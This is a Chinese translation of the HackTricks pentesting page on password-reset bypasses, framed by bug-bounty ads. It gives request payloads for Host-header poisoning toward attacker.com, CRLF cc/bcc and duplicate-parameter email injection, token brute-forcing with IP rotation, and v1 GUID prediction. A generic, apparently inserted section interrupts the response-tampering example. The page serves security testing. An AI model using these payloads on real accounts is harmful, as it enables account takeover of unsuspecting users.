hacktricks/pentesting-web/reset-password.md
2023-08-03 19:12:22 +00:00

16 KiB
Raw Blame History

重置/忘记密码绕过

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

HackenProof是所有加密漏洞赏金的家园。

无需延迟获得奖励
HackenProof的赏金只有在客户存入奖励预算后才会启动。在漏洞验证后您将获得奖励。

在web3渗透测试中获得经验
区块链协议和智能合约是新的互联网在其崛起的日子里掌握web3安全。

成为web3黑客传奇
每次验证的漏洞都会获得声誉积分,并占据每周排行榜的榜首。

在HackenProof上注册开始从您的黑客行动中获利!

{% embed url="https://hackenproof.com/register" %}

以下技术重新编译自https://anugrahsr.github.io/posts/10-Password-reset-flaws/

通过引用泄漏密码重置令牌

HTTP referer是一个可选的HTTP头字段用于标识链接到所请求资源的网页的地址。引用请求头包含从当前请求页面跟踪链接到当前请求页面的上一个网页的地址。

利用

  • 向您的电子邮件地址请求重置密码
  • 点击密码重置链接
  • 不更改密码
  • 点击任何第三方网站例如FacebookTwitter
  • 在burpsuite代理中拦截请求
  • 检查引用头是否泄漏密码重置令牌。

影响

它允许控制特定站点的人更改用户的密码CSRF攻击因为此人知道用户的重置密码令牌。

参考:

密码重置毒化

如果您发现主机头攻击超出范围,请尝试找到密码重置按钮!

利用

  • 在Burpsuite中拦截密码重置请求
  • 添加以下头部或在Burpsuite中编辑头部逐个尝试
Host: attacker.com
Host: target.com
X-Forwarded-Host: attacker.com
Host: target.com
Host: attacker.com
  • 检查电子邮件中更改密码的链接是否指向 attacker.com

修复

使用 $_SERVER['SERVER_NAME'] 而不是 $_SERVER['HTTP_HOST']

$resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/reset-password.php?token=12345678-1234-1234-1234-12345678901";

影响

受害者将在其电子邮件中收到恶意链接,当点击该链接时,将泄露用户的密码重置链接/令牌给攻击者,导致完全接管账户。

参考:

通过操纵电子邮件参数进行密码重置

漏洞利用

  • 使用 & 将攻击者的电子邮件添加为第二个参数
POST /resetPassword
[...]
email=victim@email.com&email=attacker@email.com
  • 将攻击者的电子邮件作为第二个参数添加,使用 %20
POST /resetPassword
[...]
email=victim@email.com%20email=attacker@email.com
  • 将攻击者的电子邮件作为第二个参数使用 |
POST /resetPassword
[...]
email=victim@email.com|email=attacker@email.com
  • 将攻击者的电子邮件作为第二个参数添加使用抄送cc
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
  • 将攻击者的电子邮件作为第二个参数添加并使用密送BCC功能。
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
  • 将攻击者的电子邮件作为第二个参数添加,使用逗号分隔。
POST /resetPassword
[...]
email="victim@mail.tld",email="attacker@mail.tld"
  • 将攻击者的电子邮件作为第二个参数添加到JSON数组中
POST /resetPassword
[...]
{"email":["victim@mail.tld","atracker@mail.tld"]}

参考资料

通过 API 参数更改任意用户的电子邮件和密码

漏洞利用

  • 攻击者必须使用自己的帐户登录并转到更改密码功能
  • 启动 Burp Suite 并拦截请求
  • 在拦截请求后,将其发送到重复器并修改参数 Email 和 Password
POST /api/changepass
[...]
("form": {"email":"victim@email.tld","password":"12345678"})

参考资料

无速率限制: 邮件轰炸

利用

  • 启动Burp Suite并拦截密码重置请求
  • 发送到Intruder
  • 使用空负载

参考资料

查找密码重置令牌生成方式

找出密码重置令牌的模式

如果它是

  • 基于时间戳生成
  • 基于用户ID生成
  • 基于用户电子邮件生成
  • 基于名字和姓氏生成
  • 基于出生日期生成
  • 基于密码学生成

使用Burp Sequencer查找令牌的随机性或可预测性。

可猜测的GUID

有不同类型的GUID

  • **版本0**仅在nil GUID"00000000-0000-0000-0000-000000000000")中可见。
  • **版本1**GUID是根据以下方式可预测生成的
  • 当前时间
  • 在生成系统的正常运行时间内,保持不变的随机生成的“时钟序列”
  • 如果可用基于系统的MAC地址生成的“节点ID”
  • **版本3**GUID是使用提供的名称和命名空间的MD5哈希生成的。
  • **版本4**GUID是随机生成的。
  • **版本5**GUID是使用提供的名称和命名空间的SHA1哈希生成的。

可以查看GUID并找出其版本有一个小工具可以做到这一点guidtool****

guidtool -i 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c
UUID version: 1
UUID time: 2021-11-17 17:52:18.141000
UUID timestamp: 138564643381410000
UUID node: 17547390002044
UUID MAC address: 0f:f5:91:f2:a3:7c
UUID clock sequence: 3426

如果用于生成重置密码GUID的版本是版本1那么可以使用暴力破解攻击来破解GUIDS

guidtool 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c -t '2021-11-17 18:03:17' -p 10000
a34aca00-47d0-11ec-8d62-0ff591f2a37c
a34af110-47d0-11ec-8d62-0ff591f2a37c

参考资料

响应篡改:用好的响应替换坏的响应

寻找以下类型的请求和响应

HTTP/1.1 401 Unauthorized
(“message”:”unsuccessful”,”statusCode:403,”errorDescription”:”Unsuccessful”)

重置密码

当进行网络渗透测试时,重置密码是一种常见的攻击技术,可以帮助我们获取目标系统的访问权限。以下是一些常用的重置密码技术:

1. 忘记密码功能滥用

许多网站和应用程序提供了“忘记密码”功能,允许用户通过电子邮件或手机短信重置密码。攻击者可以利用这个功能来重置目标用户的密码,从而获取对其账户的访问权限。

攻击者可以尝试以下方法来滥用忘记密码功能:

  • 枚举用户名:通过尝试不同的用户名,攻击者可以确定哪些用户在目标系统上注册了账户。
  • 枚举重置密码选项:攻击者可以尝试不同的重置密码选项,例如通过电子邮件或手机短信重置密码。
  • 社会工程学攻击:攻击者可以通过欺骗目标用户提供其个人信息,例如出生日期、住址等,从而成功重置密码。

2. 弱密码重置

有些网站和应用程序在重置密码时可能会使用弱密码重置机制。攻击者可以利用这个漏洞来重置目标用户的密码。

攻击者可以尝试以下方法来利用弱密码重置漏洞:

  • 枚举重置密码链接:攻击者可以尝试通过枚举不同的重置密码链接来找到有效的链接。
  • 预测重置密码链接:攻击者可以尝试预测重置密码链接的格式,例如使用常见的命名约定或模式。
  • 暴力破解重置密码链接:攻击者可以使用暴力破解工具来尝试猜测有效的重置密码链接。

3. 会话劫持

会话劫持是一种攻击技术,攻击者可以通过获取目标用户的会话令牌来重置其密码。

攻击者可以尝试以下方法来进行会话劫持:

  • 窃取会话令牌:攻击者可以通过窃取目标用户的会话令牌来获取对其账户的访问权限。
  • 重放攻击:攻击者可以通过重放先前捕获的会话令牌来重置目标用户的密码。

4. 操作系统和应用程序漏洞

操作系统和应用程序中的漏洞可能会导致重置密码的安全问题。攻击者可以利用这些漏洞来重置目标用户的密码。

攻击者可以尝试以下方法来利用操作系统和应用程序漏洞:

  • 利用已知漏洞:攻击者可以利用已知的操作系统和应用程序漏洞来获取对目标系统的访问权限。
  • 密码重置令牌泄露:某些操作系统和应用程序可能会将密码重置令牌存储在不安全的位置,攻击者可以通过泄露的令牌来重置密码。

以上是一些常见的重置密码技术,渗透测试人员可以利用这些技术来评估目标系统的安全性,并提供相应的建议和解决方案来修复潜在的漏洞。

HTTP/1.1 200 OK
(“message”:”success”,”statusCode:200,”errorDescription”:”Success”)

参考

使用过期的令牌

  • 检查过期的令牌是否可以重用

暴力破解密码重置令牌

尝试使用Burpsuite暴力破解重置令牌

POST /resetPassword
[...]
email=victim@email.com&code=$BRUTE$
  • 使用Burp Suite上的IP-Rotator绕过基于IP的速率限制。

参考资料

尝试使用您的令牌

  • 尝试将您的密码重置令牌添加到受害者的账户中。
POST /resetPassword
[...]
email=victim@email.com&code=$YOUR_TOKEN$

参考

注销/重置密码中的会话失效

当用户注销或重置密码时,当前会话应该被使无效。
因此,在用户登录时,获取cookies,然后进行注销,并检查是否cookies仍然有效。
重复此过程,改为更改密码而不是注销。

重置令牌过期时间

重置令牌必须有一个过期时间,在此之后,令牌不应该有效来更改用户的密码。

额外检查

  • 使用username@burp_collab.net并分析回调
  • 使用carbon copy email=victim@mail.com%0a%0dcc:hacker@mail.com
  • 长密码(>200会导致拒绝服务DoS
  • 添加第二个电子邮件参数和值

HackenProof是所有加密漏洞赏金的家园。

即刻获得奖励
HackenProof的赏金只有在客户存入奖励预算后才会启动。在漏洞验证后您将获得奖励。

在web3渗透测试中获得经验
区块链协议和智能合约是新的互联网掌握web3安全的崛起之日。

成为web3黑客传奇
每次验证的漏洞都会获得声望积分,并占据每周排行榜的榜首。

在HackenProof上注册 开始从您的黑客攻击中获利!

{% embed url="https://hackenproof.com/register" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥